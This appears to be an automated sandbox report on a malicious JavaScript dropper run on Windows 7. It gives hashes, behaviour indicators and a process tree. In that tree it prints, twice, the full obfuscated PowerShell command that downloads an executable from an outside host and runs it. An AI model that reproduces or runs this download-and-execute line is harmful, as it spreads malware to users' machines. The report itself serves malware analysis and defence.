f4e72685fb3efa5bad200451d36c7d1e72a94515c515bdbb09c00254dca289ea

Analysis

max time kernel
31s
max time network
33s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
05/05/2023, 11:49

Target

pax_2023_AB1058..js
Size

28KB
MD5

12f77d1be4344fb88f1093550b092ab6
SHA1

1f940943608479599f11d2d8fd0734a74d456ea8
SHA256

f4e72685fb3efa5bad200451d36c7d1e72a94515c515bdbb09c00254dca289ea
SHA512

16444b02d23744740a3d2d32d1c62b35ced138cdd3a053dc3dcafc556c3b112ba157793e11c8b095bd3baac80455d12c6cacec363c03df7ca59e59f852c83748
SSDEEP

768:qmqR4BMNPxfyxlKAbtSg0r3T9XRLlPJ3CKF:q5cMvfyxlJb4g0r3TJRLP3CKF

Score

10^/10

Language

ps1

Deobfuscated

URLs

exe.dropper

http://homospoison.ru/one/portable.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
4	556	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
556	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	556	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 1540 wrote to memory of 992	1540	wscript.exe	28
PID 1540 wrote to memory of 992	1540	wscript.exe	28
PID 1540 wrote to memory of 992	1540	wscript.exe	28
PID 992 wrote to memory of 556	992	cmd.exe	30
PID 992 wrote to memory of 556	992	cmd.exe	30
PID 992 wrote to memory of 556	992	cmd.exe	30

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\pax_2023_AB1058..js
1⤵
- Suspicious use of WriteProcessMemory
PID:1540
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c pO^wErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.We'; $v2='bClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://homospoison.ru/one/portable.exe','%temp%gEq94.exe'); & %temp%gEq94.exe & ZJHYOcunksxSdyp
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:992
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    pOwErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.We'; $v2='bClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://homospoison.ru/one/portable.exe','C:\Users\Admin\AppData\Local\TempgEq94.exe');
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:556

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

memory/556-59-0x0000000002580000-0x0000000002600000-memory.dmp

Filesize
512KB

Download
memory/556-60-0x000000001B350000-0x000000001B632000-memory.dmp

Filesize
2.9MB

Download
memory/556-61-0x0000000001FC0000-0x0000000001FC8000-memory.dmp

Filesize
32KB

Download
memory/556-62-0x0000000002580000-0x0000000002600000-memory.dmp

Filesize
512KB

Download